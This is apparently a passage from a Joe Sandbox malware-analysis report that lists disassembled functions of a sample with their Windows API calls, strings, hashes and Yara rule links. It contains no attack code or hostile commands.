Opcode Fuzzy Hash: 79764bceedd57b34548c19b6de6bf2e7df27f3fd7086c6230994bb87576022d0
Instruction Fuzzy Hash: 2E617A70208302AFDB10DF54D985B6EB7E8EF89724F05491AF9859B291D770ED48CBB2

Function 00D98694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 00D986F5
inet_addr.WS2_32(?), ref: 00D9873A
gethostbyname.WS2_32(?), ref: 00D98746
IcmpCreateFile.IPHLPAPI ref: 00D98754
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00D987C4
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00D987DA
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00D9884F
WSACleanup.WS2_32 ref: 00D98855

Strings

Ping, xrefs: 00D98778

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 1ecc26fb2a79ec8a80465165c876b534536a85bfc8e28e1d6c0a1dc9ea1eb7c2
Instruction ID: 1655f7a393a0519b06cb97476d3015755e02229bb88d74fb186f283f334b8fc8
Opcode Fuzzy Hash: 1ecc26fb2a79ec8a80465165c876b534536a85bfc8e28e1d6c0a1dc9ea1eb7c2
Instruction Fuzzy Hash: 5C5181316043019FDB10AF64DC45B2ABBE5EF49B20F14892AF996DB2A1DB34E804DB71

Function 00DA9C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DA9C68
CreateMenu.USER32 ref: 00DA9C83
SetMenu.USER32(?,00000000), ref: 00DA9C92
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DA9D1F
IsMenu.USER32(?), ref: 00DA9D35
CreatePopupMenu.USER32 ref: 00DA9D3F
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DA9D70
DrawMenuBar.USER32 ref: 00DA9D7E

Strings

0, xrefs: 00DA9C61

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0
API String ID: 176399719-4108050209
Opcode ID: 0de044f4bf06a0a388795ed4d180613610299525df21164197cfbec9e21bba29
Instruction ID: 49752ffee3799acc97ed815dec6bc59be72f307b687ece7019daaa8dd985aace
Opcode Fuzzy Hash: 0de044f4bf06a0a388795ed4d180613610299525df21164197cfbec9e21bba29
Instruction Fuzzy Hash: FF414579A0020AAFDF10EF68D894F9ABBB6FF4A314F184068E945A7351D731A954CF70

Function 00D8EC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00D8EC1E
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00D8EC94
GetLastError.KERNEL32 ref: 00D8EC9E
SetErrorMode.KERNEL32(00000000,READY), ref: 00D8ED0B

Strings

READY, xrefs: 00D8ECE4
READONLY, xrefs: 00D8ECD6
UNKNOWN, xrefs: 00D8ECC3
INVALID, xrefs: 00D8ECDD
NOTREADY, xrefs: 00D8ECCA

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 160d6d232b8c4c787077bbd95659f0529b6c3bdab56372134e8de8f03d55f061
Instruction ID: 754888cf83e68a63166fe6061ef205c10e1f7c81c732c8934f46d896a1c0c917
Opcode Fuzzy Hash: 160d6d232b8c4c787077bbd95659f0529b6c3bdab56372134e8de8f03d55f061
Instruction Fuzzy Hash: AE318D35A0020AAFC710FF69DD49EAEBBB4EB44700F198026F506E7291DA71DA45CBB1

Function 00D7C6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00D7C782
GetDlgCtrlID.USER32 ref: 00D7C78D
GetParent.USER32 ref: 00D7C7A9
SendMessageW.USER32(00000000,?,00000111,?), ref: 00D7C7AC
GetDlgCtrlID.USER32(?), ref: 00D7C7B5
GetParent.USER32(?), ref: 00D7C7D1
SendMessageW.USER32(00000000,?,?,00000111), ref: 00D7C7D4

Strings

ListBox, xrefs: 00D7C73F
ComboBox, xrefs: 00D7C707

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$CtrlParent$_memmove
String ID: ComboBox$ListBox
API String ID: 313823418-1403004172
Opcode ID: a725f360845258fb85a8bad9ebba33e8e40c4c40032189859e63dc3fb2f49ca1
Instruction ID: b739e1323d8f18562cfddc73641390ff205e06d1acbd6727614abbcfaae8fc92
Opcode Fuzzy Hash: a725f360845258fb85a8bad9ebba33e8e40c4c40032189859e63dc3fb2f49ca1
Instruction Fuzzy Hash: 5721A174A40209AFDF09EBA4CC85EBEB775EB45310F148119F566D32D1EB78981AEB30

Function 00D7C7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00D7C869
GetDlgCtrlID.USER32 ref: 00D7C874
GetParent.USER32 ref: 00D7C890
SendMessageW.USER32(00000000,?,00000111,?), ref: 00D7C893
GetDlgCtrlID.USER32(?), ref: 00D7C89C
GetParent.USER32(?), ref: 00D7C8B8
SendMessageW.USER32(00000000,?,?,00000111), ref: 00D7C8BB

Strings

ListBox, xrefs: 00D7C828
ComboBox, xrefs: 00D7C7F0

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$CtrlParent$_memmove
String ID: ComboBox$ListBox
API String ID: 313823418-1403004172
Opcode ID: d4cfc1193aee4bf2d6406c0bef0043f28db8827a762bf5d56108cb2060d0f2d9
Instruction ID: 70b80e35cabf6aa16a58c401467461fec1cf34cd089b7a3f6e25a50a2ced4609
Opcode Fuzzy Hash: d4cfc1193aee4bf2d6406c0bef0043f28db8827a762bf5d56108cb2060d0f2d9
Instruction Fuzzy Hash: B721A171940209AFDF00ABA4CC85EBEB775EB45300F144156F555E3291EB78981ADB30

Function 00D7C8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00D7C8D9
GetClassNameW.USER32(00000000,?,00000100), ref: 00D7C8EE
_wcscmp.LIBCMT ref: 00D7C900
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00D7C97B

Strings

details, xrefs: 00D7C929
largeicons, xrefs: 00D7C90F
smallicons, xrefs: 00D7C943
SHELLDLL_DefView, xrefs: 00D7C8FA
list, xrefs: 00D7C95D

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 68e97342e34364086a9a042dbd50b8b2d64f5f127642bab137559286d02897bf
Instruction ID: c7be52da7daed431d02793c6f87e45f3a0830825d26dd7143ed3948d22ebc096
Opcode Fuzzy Hash: 68e97342e34364086a9a042dbd50b8b2d64f5f127642bab137559286d02897bf
Instruction Fuzzy Hash: 0C112C7A258307BEF6542A34DC0BCB677DCDB07361B20802AFF04E50D6FBA1A9018974

Function 00D8B05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00D8B137

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 9eb8d0a2b6cb567d51629270bf3476c70764abec4f6e97b02492222e878744a8
Instruction ID: d32421d89ac64caa44c39d8bb9929b554ac9cf8204ad28a617a88f52726a747d
Opcode Fuzzy Hash: 9eb8d0a2b6cb567d51629270bf3476c70764abec4f6e97b02492222e878744a8
Instruction Fuzzy Hash: A9C19D75A0421ADFDB04EF98C481BAEBBB4FF09325F24406AE656E7251D734A941CBB0

Function 00D6BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00D6BA74

Part of subcall function 00D68984: __mtinitlocknum.LIBCMT ref: 00D68996
Part of subcall function 00D68984: RtlEnterCriticalSection.NTDLL(00D60127), ref: 00D689AF

__calloc_crt.LIBCMT ref: 00D6BA85

Part of subcall function 00D67616: __calloc_impl.LIBCMT ref: 00D67625
Part of subcall function 00D67616: Sleep.KERNEL32(00000000,?,00D60127,?,00D4125D,00000058,?,?), ref: 00D6763C

@_EH4_CallFilterFunc@8.LIBCMT ref: 00D6BAA0
GetStartupInfoW.KERNEL32(?,00DF6990,00000064,00D66B14,00DF67D8,00000014), ref: 00D6BAF9
__calloc_crt.LIBCMT ref: 00D6BB44
GetFileType.KERNEL32(00000001), ref: 00D6BB8B
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00D6BBC4

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: edecfacaad21ec66a4376013396f3d63bdbf716246f54915854b6fa48fe95b39
Instruction ID: b781269b017542c58a5c67b76077a5d189de08d9dec1cf09ba45f3deb5f988f8
Opcode Fuzzy Hash: edecfacaad21ec66a4376013396f3d63bdbf716246f54915854b6fa48fe95b39
Instruction Fuzzy Hash: 1281A1709047458FDB24CF68C8846A9BBF0EF45334B28426ED4A6EB3D1DB359986CB74

Function 00D87212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00D87226
__swprintf.LIBCMT ref: 00D87233

Part of subcall function 00D6234B: __woutput_l.LIBCMT ref: 00D623A4

FindResourceW.KERNEL32(?,?,0000000E), ref: 00D8725D
LoadResource.KERNEL32(?,00000000), ref: 00D87269
LockResource.KERNEL32(00000000), ref: 00D87276
FindResourceW.KERNEL32(?,?,00000003), ref: 00D87296
LoadResource.KERNEL32(?,00000000), ref: 00D872A8
SizeofResource.KERNEL32(?,00000000), ref: 00D872B7
LockResource.KERNEL32(?), ref: 00D872C3
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00D87322

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 503081db5ee530f4d0bcaee4dd76bb4af0b65106995f4266d615cd1eca3dd2f9
Instruction ID: 28d389dec1d952cf7f397bc8a74f6d00ea116f264af09e17fffff9076e7c45ec
Opcode Fuzzy Hash: 503081db5ee530f4d0bcaee4dd76bb4af0b65106995f4266d615cd1eca3dd2f9
Instruction Fuzzy Hash: 42318DB1A0425BABDB01AF61DC89EBFBBA9FF08341B244425F911E6250E734D950DBB4

Function 00D84A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00D84A7D
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84A91
GetWindowThreadProcessId.USER32(00000000), ref: 00D84A98
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84AA7
GetWindowThreadProcessId.USER32(?,00000000), ref: 00D84AB9
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84AD2
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84AE4
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84B29
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84B3E
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84B49

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 4b1cd487686eb668dab51459e8fe5a209cc1fd7a8d88f040a82a1959acf1912a
Instruction ID: f0619965386474b1639660bd1641acd2c35364f225d870d99ac7a15fc75c25a7
Opcode Fuzzy Hash: 4b1cd487686eb668dab51459e8fe5a209cc1fd7a8d88f040a82a1959acf1912a
Instruction Fuzzy Hash: 2231C171610307AFDB10EB65DC88F6AB7AEAB50311F184119F905E7290D3B5ED86CB70

Function 00DBEC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00DBEC32
SendMessageW.USER32(?,00001328,00000000,?), ref: 00DBEC49
GetWindowDC.USER32(?), ref: 00DBEC55
GetPixel.GDI32(00000000,?,?), ref: 00DBEC64
ReleaseDC.USER32(?,00000000), ref: 00DBEC76
GetSysColor.USER32(00000005), ref: 00DBEC94

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 2330d5f3116588fd5a1630b18b75cfc63ac21ea41a6f168f2537897efc893799
Instruction ID: 466ebeac19caabca7ebb66432a607399ac9a172bdecad4960292070ef37c0fdd
Opcode Fuzzy Hash: 2330d5f3116588fd5a1630b18b75cfc63ac21ea41a6f168f2537897efc893799
Instruction Fuzzy Hash: 16214A31500706EFDB21AB64EC48FEA7BA2EB05322F144225FA66A52E1CB314945DF31

Function 00D7D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00D7DD46), ref: 00D7DC86

Strings

INSTANCE, xrefs: 00D7DB94
REGEXPCLASS, xrefs: 00D7DA4C
NAME, xrefs: 00D7DAB8
TEXT, xrefs: 00D7DBBD
CLASSNN, xrefs: 00D7DA29
CLASS, xrefs: 00D7DA06

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 67ab0415db5f3ac1a242e77d6bc90660e0ae4e7b6f24f0a102c2cb6fd93be141
Instruction ID: 1d94acdbe09f92dc2418b3b696cf027d69e192558e6f4ae9443e8d22756a4c50
Opcode Fuzzy Hash: 67ab0415db5f3ac1a242e77d6bc90660e0ae4e7b6f24f0a102c2cb6fd93be141
Instruction Fuzzy Hash: 33919270A00606ABCB08DF64C491BE9FB76FF19310F58C519DD9EA7251EB30A959CBB0

Function 00D445A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D445F0
CoUninitialize.COMBASE ref: 00D44695
UnregisterHotKey.USER32(?), ref: 00D447BD
DestroyWindow.USER32(?), ref: 00DB5936
FreeLibrary.KERNEL32(?), ref: 00DB599D
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DB59CA

Strings

close all, xrefs: 00D445EB

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: ddf1c91fabc7a9316e85c87f8f03b8211970518daf59569709f6ff2a6f318fdf
Instruction ID: 1fa438f1678b151fb784dafc0c310b31f8485c0cc318b7f701862600e95940e1
Opcode Fuzzy Hash: ddf1c91fabc7a9316e85c87f8f03b8211970518daf59569709f6ff2a6f318fdf
Instruction Fuzzy Hash: 0B912934600602CFCB19EF24D895BA9F3A4FF15701F5542A9F44AA7266DB30AE5ACF70

Function 00D5C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00D5C2D2

Part of subcall function 00D5C697: GetClientRect.USER32(?,?), ref: 00D5C6C0
